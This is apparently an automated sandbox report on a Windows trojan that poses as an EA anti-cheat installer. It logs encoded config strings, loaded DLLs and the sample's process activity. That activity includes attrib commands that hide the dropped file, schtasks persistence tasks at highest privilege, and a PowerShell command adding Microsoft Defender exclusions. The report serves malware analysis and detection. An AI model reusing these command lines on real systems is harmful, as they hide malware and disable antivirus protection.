                  Source: $77EAAntiCheat.Installler.exe.0.dr, Settings.csBase64 encoded string: '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'
                  Source: $77EAAntiCheat.Installler.exe.0.dr, Installation.csBase64 encoded string: 'YuiIb0bvpOW/HwRCrl07ZyLIxUPAoAy0/EE6+OB0IBiLlp486XC9OZHtGsiixnNW'
                  Source: $77EAAntiCheat.Installler.exe.0.dr, MessageRead.csBase64 encoded string: 'YuiIb0bvpOW/HwRCrl07ZyLIxUPAoAy0/EE6+OB0IBhStm9RR7V2byuc2qvN4qWd'
                  Source: $77EAAntiCheat.Installler.exe.0.dr, GetInformationOS.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: $77EAAntiCheat.Installler.exe.0.dr, GetInformationOS.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: Xyq6rvzLJs.exe, GetInformationOS.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: Xyq6rvzLJs.exe, GetInformationOS.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: $77EAAntiCheat.Installler.exe.0.dr, Installation.csSecurity API names: File.GetAccessControl
                  Source: $77EAAntiCheat.Installler.exe.0.dr, Installation.csSecurity API names: File.SetAccessControl
                  Source: $77EAAntiCheat.Installler.exe.0.dr, Installation.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                  Source: Xyq6rvzLJs.exe, Installation.csSecurity API names: File.GetAccessControl
                  Source: Xyq6rvzLJs.exe, Installation.csSecurity API names: File.SetAccessControl
                  Source: Xyq6rvzLJs.exe, Installation.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@32/10@3/2
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeFile created: C:\Users\user\AppData\Roaming\EAJump to behavior
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6648:120:WilError_03
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeMutant created: \Sessions\1\BaseNamedObjects\lAxDBRhAFu
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5988:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1776:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6200:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2968:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1272:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2944:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6640:120:WilError_03
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeFile created: C:\Users\user\AppData\Local\Temp\tmpF224.tmpJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpF224.tmp.bat""
                  Source: Xyq6rvzLJs.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: Xyq6rvzLJs.exeReversingLabs: Detection: 63%
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeFile read: C:\Users\user\Desktop\Xyq6rvzLJs.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\Xyq6rvzLJs.exe "C:\Users\user\Desktop\Xyq6rvzLJs.exe"
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\System32\attrib.exe" +s +h "C:\Users\user\AppData\Roaming\EA"
                  Source: C:\Windows\System32\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\System32\attrib.exe" +s +h "C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exe"
                  Source: C:\Windows\System32\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpF224.tmp.bat""
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 3
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exe "C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exe"
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks.exe" /query /TN $77EAAntiCheat.Installler.exe
                  Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks.exe" /Create /SC ONCE /TN "$77EAAntiCheat.Installler.exe" /TR "C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exe \"\$77EAAntiCheat.Installler.exe\" /AsAdmin" /ST 00:01 /IT /F /RL HIGHEST
                  Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks.exe" /query /TN $77EAAntiCheat.Installler.exe
                  Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /sc daily /tn "EAAntiCheat.Installler_Task-DAILY-21PM" /TR "%MyFile%" /ST 21:00
                  Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exe C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exe "\$77EAAntiCheat.Installler.exe" /AsAdmin
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\System32\attrib.exe" +s +h "C:\Users\user\AppData\Roaming\EA"Jump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\System32\attrib.exe" +s +h "C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpF224.tmp.bat""Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 3Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exe "C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks.exe" /query /TN $77EAAntiCheat.Installler.exeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks.exe" /Create /SC ONCE /TN "$77EAAntiCheat.Installler.exe" /TR "C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exe \"\$77EAAntiCheat.Installler.exe\" /AsAdmin" /ST 00:01 /IT /F /RL HIGHESTJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks.exe" /query /TN $77EAAntiCheat.Installler.exeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exitJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /sc daily /tn "EAAntiCheat.Installler_Task-DAILY-21PM" /TR "%MyFile%" /ST 21:00Jump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dllJump to behavior
                  Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dllJump to behavior
                  Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dllJump to behavior
                  Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\System32\timeout.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
